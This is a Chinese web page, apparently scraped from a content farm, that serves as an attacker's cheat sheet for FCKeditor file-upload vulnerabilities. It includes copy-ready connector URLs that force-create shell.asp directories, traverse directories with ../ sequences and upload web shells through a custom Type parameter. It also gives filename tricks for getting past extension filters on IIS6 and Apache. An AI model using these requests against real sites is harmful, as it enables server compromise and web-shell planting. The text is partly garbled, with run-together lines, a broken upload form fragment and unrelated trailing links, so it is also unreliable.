编辑器漏洞_编辑器文件上传漏洞一看就会
一、FCKeditor编辑器页FCKeditor/_samples/default.htmlFCKeditor/_samples/default
一、FCKeditor编辑器页FCKeditor/_samples/default.html FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp fckeditor/editor/filemanager/connectors/test.html
FCKeditor 查看编辑器版本FCKeditor/_whatsnew.htmlFCKeditor V2.43 版本FCKeditor/editor/filemanager/browser/default
/connectors/php/config.phpFCKeditor V2.6.6版本FCKeditor/editor/filemanager/connectors/asp/config.phpFCKeditor 匿名上传文件
影响版本:非优化/精简版本的FCKeditor脆弱描述:如果存在以下文件,打开后即可上传文件攻击利用:FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/browser/。
default/connectors/test.html FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor 查看文件上传路径FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML页面中第二行 url=/xxx的部分就是默认基准上传路径Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言
FCKeditor被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3脆弱描述:FCKeditor v2.4.3中File类别默认拒绝上传类型html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件上传后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName
而没有使用$sExtension为后缀直接导致在win下在上传文件后面加个.来突破[未测试]而在apache下,因为”Apache文件名解析缺陷漏洞”也可以利用附:A – Apache文件名解析缺陷漏洞。
测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux1.国外(SSR TEAM)发了多个advisory称Apache’s MIME module (mod_mime)相关漏洞,就是attack.php.rar会被当做php文件执行的漏洞,包括Discuz!那个
p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞2.S4T的superhei在blog上发布了这个apache的小特性,即apache 是从后面开始检查后缀,按最后一个合法后缀执行。
其实只要看一下apache的htdocs那些默认安装的index.XX文件就明白了3.可以充分利用在上传漏洞上,列举如下典型型:rar备份型:bak,lock流媒体型:wma,wmv,asx,as,mp4,rmvb
微软型:sql,chm,hlp,shtml,asp任意型:test,fake,ph4nt0m特殊型:torrent程序型:jsp,c,cpp,pl,cgi利用2003路径解析漏洞上传木马影响版本安装了iis6的服务器(windows2003),受影响的文件名后缀有.asp .asa .cdx .cer .pl .php .cgi
脆弱描述:利用2003系统路径解析漏洞的原理,创建类似bin.asp如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行攻击利用:fckeditor/editor/filemanager/browser/。
default/browser.html?Type=Image&Connector=connectors/asp/connector.asp强制建立shell.asp目录:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
或者FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/
&Type=Image&NewFolderName=shell.aspFCKeditor PHP上传任意文件漏洞影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2脆弱描述:FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。
攻击利用:
method="post">Upload a new file:
type="submit"value="Upload">PS:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
FCKeditor 暴路径漏洞影响版本:aspx版FCKeditor攻击利用:FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
1.aspFCKeditor 文件上传“.”变“_”下划线的绕过方法(一)影响版本: FCKeditor => 2.4.x脆弱描述:我们上传的文件例如:shell.php.rar或shell.php;.jpg会变为shell_php;.jpg这是新版FCK的变化。
攻击利用:提交1.php+空格 绕过ps:※空格只支持win系统unix是不支持的[1.php和1.php+空格是2个不同的文件]FCKeditor 文件上传“.”变“_”下划线的绕过方法(二)影响版本:=>2.4.x的最新版已修补
来源:T00LS.Net大佬的解释由于Fckeditor对第一次上传123.asp;123.jpg 这样的格式做了过滤也就是IIS6解析漏洞上传第一次被过滤为123_asp;123.jpg 从而无法运行。
但是第2次上传同名文件123.asp;123.jpg后由于”123_asp;123.jpg”已经存在文件名被命名为123.asp;123(1).jpg …… 123.asp;123(2).jpg这样的编号方式。
所以IIS6的漏洞继续执行了如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:1.FCKeditor没有开启文件上传功能,这项功能在安装FCKeditor时默认是关闭的如果想上传文件,FCKeditor会给出错误提示。
2.网站采用了精简版的FCKeditor,精简版的FCKeditor很多功能丢失,包括文件上传功能3.FCKeditor的这个漏洞已经被修复FCKeditor 新闻组件遍历目录漏洞影响版本:Aspx与JSP版FCKeditor。
脆弱描述:Getshell请参考“TYPE自定义变量任意上传文件漏洞”攻击利用:修改CurrentFolder参数使用 …/…/来进入不同的目录/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../
../..%2F&NewFolderName=aspx.asp根据返回的XML信息可以查看网站所有的目录/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%
2F/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2FTYPE自定义变量任意上传文件漏洞
链接上一段影响版本: 较早版本脆弱描述:通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制攻击利用:直接修改上传类型参数 直接上传 getshell/FCKeditor/editor/filemanager/browser/。
default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:
http://XXXXX/UserFiles/all/1.asp解释: Type=all 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.例如:网马就可以传到网站的根目录下.
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
如找不到默认上传文件夹可检查此文件:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
- 标签:
- 编辑:李松一
- 相关文章
-
腾讯老总_腾讯老总力挺肖战真没想到
新的一岁里,肖战希望自己能甩开烦恼坚持下去,并且还不忘感谢父母,要成为他们的依靠。不过意外的是,他身上所穿的背带裤已经开了扣子,可…
-
vb excel_VB excel 单元格 文字 行数一看就会
VBA之根据单元格的值插入并复制行
- 十一假期安排_十一假期安排放假安排一篇读懂
- 新疆餐厅_新疆餐厅名字简单大气万万没想到
- dnf瞎子加点_dnf瞎子走什么属强深度揭秘
- 软件打包_软件打包成一键安装这都可以?
- 余尝谓读书有三到谓心到眼到口到的意思_古人谈读书_一_二翻译燃爆了